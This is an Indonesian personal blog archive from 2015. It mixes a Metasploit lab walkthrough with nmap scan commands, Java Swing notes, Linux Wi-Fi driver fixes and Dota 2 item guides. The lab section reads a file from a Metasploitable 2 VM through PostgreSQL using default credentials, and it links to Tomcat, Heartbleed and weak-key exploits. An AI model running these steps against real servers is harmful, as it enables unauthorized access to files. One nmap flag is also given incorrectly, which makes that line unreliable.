Senin, 23 Februari 2015

Metasploit : Link URL Tentang Penggunaan Metasploit

Link URL ke blog yg membahas tentang penggunaan Metasploit:

https://pentestlab.wordpress.com/2012/04/13/attacking-postgresql/


Scanning Port Menggunakan Metasploit:

https://pentestlab.wordpress.com/2012/02/



Tutorial Metasploit untuk Pemula. Diajarkan bagaimana cara mencari (search) exploit:

 https://jonathansblog.co.uk/metasploit-tutorial-for-beginners


Daftar Auxiliary dan penjelasan singkat mengenai apa itu auxiliary:

http://www.offensive-security.com/metasploit-unleashed/Auxiliary_Module_Reference


Cara mengekploitasi Tomcat server yg ada di OS Metasploitable 2:

http://colesec.inventedtheinternet.com/hacking-apache-tomcat/


http://www.securitygeeks.net/2013/05/attacking-metasploitable-apache-tomcat.html


http://www.tenable.com/plugins/index.php?view=single&id=32314


http://www.offensive-security.com/metasploit-unleashed/Admin_HTTP_Auxiliary_Modules


Scanner Metasploit untuk mengetahui kelemahan bertipe OpenSSL HeartBleed:


http://www.rapid7.com/db/modules/auxiliary/scanner/ssl/openssl_heartbleed


https://www.linkedin.com/pulse/20140502124621-24400980-how-to-run-heartbleed-attack


http://www.cisosecurity.org/?p=984


Menyerang OpenSSL di OS Metasploitable:

http://securitypadawan.blogspot.com/2011/10/attacking-metasploitable-part-2.html

http://kaoticcreations.blogspot.com/2012/08/exploiting-cve-2008-0166-debian-weak.html








Metasploit : Mencari Cara Mengekploitasi PostgreSQL

Dibawah ini salah satu referensi cara mengeksploitasi PostgreSQL server:

http://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload

http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt



Cara Membaca Isi File Di OS Metasploitable 2 Menggunakan Admin Postgres Auxiliary Modules


OS Target : Metasploitable 2 (Ubuntu Based)

OS Penyerang : Kali Linux

IP Target : 192.168.1.4

IP Penyerang : 192.168.1.2

Sumber Tutorial Referensi :



Dengan menggunakan postgres_readfile maka kita bisa membaca isi sebuah file. Dalam contoh ini saya menggunakan file sederhana berformat .txt . Sebelum menjalankan module Metasploit tersebut, saya membuat terlebih dahulu file bernama test.txt di lokasi:

/home/msfadmin

Saya membuatnya menggunakan text editor nano, isinya filenya berupa tulisan: haloooo .

Kemudian kita buka msfconsole di Kali Linux. Setelah masuk di msfconsole, langsung ketikan perintah berikut ini:

use auxiliary/admin/postgres/postgres_readfile

Kemudian ketikan perintah:

set PASSWORD postgres

set RFILE /home/msfadmin/test.txt

set RHOST 192.168.1.4

run

Maka akan muncul hasil:

Query Text: 'CREATE TEMP TABLE QLouHd (INPUT TEXT);
COPY QLouHd FROM '/home/msfadmin/test.txt';
SELECT * FROM QLouHd'
=================================================================================================================================
input
-----
haloooo









Download Presentasi

Minggu, 22 Februari 2015

NMAP: Perintah-perintah Untuk Scanning


Perintah NMAP untuk mengetahui jenis operating system di komputer target:

nmap -o IPTarget


TCP Port Scanning:

nmap -p T:NomerPort 192.168.1.2

UDP Port Scanning:

nmap -p U:NomerPort 192.168.1.2


Perintah untuk mengetahui type service yg berjalan di port itu:

nmap -sV -pT:NomerPort 192.168.1.2

Senin, 16 Februari 2015

Java SE : Tutorial jComboBox

Di bawah ini link tutorialnya:

http://www.codejava.net/java-se/swing/jcombobox-basic-tutorial-and-examples


jComboBox ternyata bisa digabungkan dengan vector, kalau sudah berurusan dengan konsep Vector, maka berarti isi variabel jComboBox nya bisa bertambah dan berkurang mengikuti isi tabel PostgreSQL. jadi bisa bikin 1 tabel yg isinya bisa mensuplai nilai variabel/pilihan data yg ada di jComboBox.


Cara mendapatkan nilai dari jComboBox:

http://stackoverflow.com/questions/11999560/get-combobox-value-in-java-swing

Source awal mengenai jComboBox, dalam source code ini sudah berhasil menaruh nilai di jComboBox, dan memprint nilai yg telah dipilih di jComboBox ke console:

http://pastebin.com/9ciXk6Nf



Java SE : Source Code yg mengandung Sub Class Dalam Penerapan OOP Untuk ID yang Ditampilkan Dalam Wujud jTextField

Dibawah ini link menuju ke source codenya:

http://pastebin.com/sfj2kycr

Minggu, 15 Februari 2015

DOTA 2 : Manfaat Ghoul Untuk Hero Warlock

Pagi pagi main DOTA 2 pakai Warlock melawan Bots. udah nyoba dapatin item refresher orb dan satu item yg mirip tongkat sihir yg ujungnya berwarna biru tua. Ternyata materi pembentuknya kebanyakan ada di Secret Shop. Udah bisa nyuruh couriernya untuk berbelanja di secret shop.
Pakai warlock ini memang sangat membutuhkan courier. Sangat terbantu dengan courier. Jadi bisa tetap mempertahankan perimeter sambil beli beli item untuk menambah kesaktian.

udah nemu cara mudah mengincar item item di bagian upgrade. Jadi tinggal tarik item upgrade nya ke ujung kanan bawah layar, nanti langsung muncul daftar item item yg perlu dikumpulkan untuk mendapatkan item upgrade itu.
Kalau udah muncul daftarnya tinggal farming aja dengan membunuh creep creep. Untuk ngumpulin Gold. Juga berusaha jangan terbunuh biar Gold nya nggak hilang karena tewas.
Beli sedikit sedikit itemnya. Karena kalau sedikit sedikit bisa mencegah Gold yg dikumpulkan hilang sia-sia dikarenakan Hero kita tewas


Kalau masalah GOUL ( Monster yg dibangkitkan oleh Warlock ). ternyata di Goul ini bukan cuma sebagai pertahanan pasif. Tapi GOUL juga bisa digerakkan ke sana ke mari mirip dengan Hero yg kita miliki. GOUL juga punya skill mirip seperti HERO. GHOUL sangat berguna bagi Warlock misalnya untuk menghadapi Hero atau membantu pasukan creep team kita yg mau menyerang tower. Jadi warlocknya nggak perlu kena tembakan dari tower lawan.
Atau bisa mengejar HERO lawan sampai ke belakang area tower lawan.

Cuma Ghoul masa hidupnya terbatas. Dan Ghoul langsung tewas jikalau Warlock yg membangkitkannya terbunuh. Makanya kalau membangkitkan Ghoul mendingan setelah membangkitkan, warlock nya lari nyari tempat sembunyi yg aman. Selanjutnya pemain tinggal konsentrasi gerakin GHOUL nya untuk harrasing/mengganggu pasukan creep atau HERO lawan.

Dengan item upgrade kita bisa membangkitkan hingga empat buah GHOUL dan dengan sebuah item yg bermiliki kekuatan mirror, kita bisa membangkitkan 2 lagi kembarannya Warlock.

Linux Mint: Mengenable Wifi Chipset Merek Ralink Type RT5390

Untuk memungkinkan agar chipset wifi merek Ralink type RT5390 agar bisa berkerja di Laptop ASUS type X45U, maka hipotesis pertama, caranya adalah dengan membuat file bernama:

asus-wifi.conf

Pembuatan file nya menggunakan account root, yang didalamnya berisi tulisan berikut ini:

options asus_nb_wmi wapf=1

Lokasi file di folder /etc/modprobe.d Kemudian restart lah laptop tersebut untuk mengaktifkan settingan yg kita buat.

Sabtu, 14 Februari 2015

Dota 2: Berhasil Membuat Dua Item Final

tadi main DOTA 2 udah dapat final item 2 biji: Vladimir's Offering & Ring of Aquila. cuma belum sempat nyobain efeknya Ring of Aquila. mainan yg mode latihan aja lawan Bots. jadi gue ada waktu buat upgrade item sambil farming ngumpulin Gold buat beli item. belajar juga cara memanfaatkan courier secara lebih mahir.

Hero nya selalu pakai Warlock , ini masih memahirkan penggunaan Warlock. selalu beli botol buat simpan-simpan obat kuat & dapat bonus yg ngambil di sungai. lumayan tuh item di sungai buat disimpan di botol. Warlock sangat memerlukan isi di dalam botol. disini warlock berperan sebagai support.

dari 6 slot item yg bisa digunakan, dikurangi botol jadi tinggal 5. baru 2 slot yg terpakai, masih tesisa 3 slot lagi untuk di isi item final. perlu pelajari kombinasi item-item final dan cara menggunakannya bersama Hero Warlock.

Jumat, 13 Februari 2015

DOTA 2: Contoh Penggunaan Sage's Mask


Di atas merupakan diagram atau dikenal sebagai Recipe untuk cara pemanfaatan Sage's Mask. Jadi Sage's Mask ditambah dengan Ring of Protection maka akan menghasilkan Ring of Basilius.

Ring of Basilius ini merupakan salah satu bahan untuk membuat Vladimir's Offering & Ring of Aquila. jadi Ring of Basilius tidak dengan sendirinya bisa langsung di upgrade menjadi Vladimir's Offering atau Ring of Aquila, namun masih membutuhkan bahan bahan lainnya sehingga bisa membentuk kedua item itu.

Contoh:

Untuk membentuk Vladimir's Offering maka dibutuhkan:

Morbid Mask
Ring Of Basilius
Ring Of Regen
Recipe



Untuk membentuk Ring Of Aquila maka dibutuhkan:
1.      Wraith Band
2.      Ring of Basilius

Untuk membentuk Wraith Band dibutuhkan bahan-bahan:
1.      Circlet
2.      Slippers of Agility
3.      Recipe


Referensi Ring of Basilius:


Referensi Ring of Aquila:


Referensi Wraith Band:


Referansi Vladimir’s Offering:


Referensi Ring of Regen:


Referensi Morbid Mask:


Referensi Circlet:


Referensi Slippers of Agility:
http://dota2.gamepedia.com/Slippers_of_Agility

Linux Mint : Mengenable Chipset WIFI Ralink Type RT5392

dibawah ini link referensi cara utak atiknya:

http://ubuntuforums.org/showthread.php?t=2138302

http://ubuntuforums.org/showthread.php?t=2138302&s=ae03df1e583b505a14f28ebb3cc8418f&p=12628115#post12628115

http://ubuntuforums.org/showthread.php?t=1743525&page=2

http://ubuntuforums.org/archive/index.php/t-1743525.html




settingan di file config.mk :

HAS_NATIVE_WPA_SUPPLICANT_SUPPORT=y

HAS_CFG80211_SUPPORT=y

HAS_ANTENNA_DIVERSITY_SUPPORT=y

HAS_ATE=y

HAS_WPA_SUPPLICANT=y







Perintah terakhir:

modprobe rt5390sta

Rabu, 11 Februari 2015

Java SE : Penerapan SubClass pada buttonGroup dan jRadioButton

Percobaan penerapan subclass pada masalah multiple groupButton yg berisi beberapa jRadioButton. Bagaimana beberapa groupButton bisa berkerja bersamaan hanya dengan sekali klik pada tombol, sehingga jRadioButton bisa menampilkan pilihan sesuai dengan pilihan yg sudah di tentukan sebelumnya:


http://pastebin.com/WDzuwVbs


ini kode awalnya untuk menginspirasi kode selanjutnya.

DOTA 2 : Link Siaran Pertandingan

Dihalaman situs seperti ini bisa kita lihat video-video pertandingan Dota 2:

http://www.gosugamers.net/teams/8954-team-secret


Ranking team-team dalam Dota 2, jika di klik link-link nya akan mengarah pada video-video pertandingan:

http://www.gosugamers.net/dota2/rankings#team






DOTA 2 : Bahan bahan Untuk Membangun Memperkuat Warlock

Referensi:

http://www.dotafire.com/dota-2/guide/warlock-the-unexpected-dominator-8724

Untuk item-item yg wajib di beli di awal permainan adalah item yg berkaitan dengan pertambahan mana & health.

di awal permainan membeli Sage Mask dulu dari shop. Kemudian Boots of Speed . Item ke 3 yg sepertinya diperlukan adalah Tango & Bottle. Alasan memakai Bottle adalah karena bisa di isi ulang melalui kurir, dan bisa di isi ulang di sungai yg lokasi tepatnya di sekitar ujung sisi kiri & kanan sungai.

Bottle adalah item yg wajib dibawa untuk saat ini. mau mencoba-coba strategi dengan menggunakan botol untuk bertahan sambil perlahan melakukan pushing ke area pertahanan musuh, dengan tetap berlindung di belakang creep. mencoba meruntuhkan Tower satu per satu.


Sesekali mencoba menyerang Hero lawan ketika hero itu  kebetulan lewat di area. Karena memainkan fungsi support maka bermain di garis belakang terus menerus. sesekali berusaha membantu teman sambil mengawasi kalau ada yg menyusup ke garis belakang & mendekati markas.

Dota 2 : Hotkeys Untuk Courier

Berikut ini daftar perintah tombol-tombol untuk courier:

F1 : Hero

F2 : kurir

Q : kurir akan datang ke lokasi kita

W : kurir akan pergi ke secret shop

E :

kurir akan datang ke lokasi kita dan mengambil item, kemudian mengembalikannya ke stash.

D : mengambil item dari stash.

F : Transfer item ke hero



Referensi:

http://dota2.gamepedia.com/Animal_Courier



Dota 2 : Video Tutorial

Video video tutorial mulai dari basic tentang Dota 2 di Steam:

http://www.youtube.com/playlist?annotation_id=annotation_400467&feature=iv&list=PLDdv1UhKaheYX_f-7GYbx5uKjF8SheYnP&src_vid=HXayKdseygg


Dota 2 : Cara Mengisi Ulang Bottle Menggunakan Kurir




TLDR Step-by-Step Guide
 



Drag and drop                        Make sure its away from the battlefield
bottle from your inventory
to the ground




Tap F2                                     Select courier          

Right click your bottle             To get the courier to fetch it

Shift + Q                                  To fly it to base

Shift + D                                  Optional: Retrieves items from stash

Shift + F                                   Transfer bottle back to hero

Shift + R                                  Speed Boost (mind the 20sec cooldown)

Tap F1                                     Select hero again


Sumber Referensi: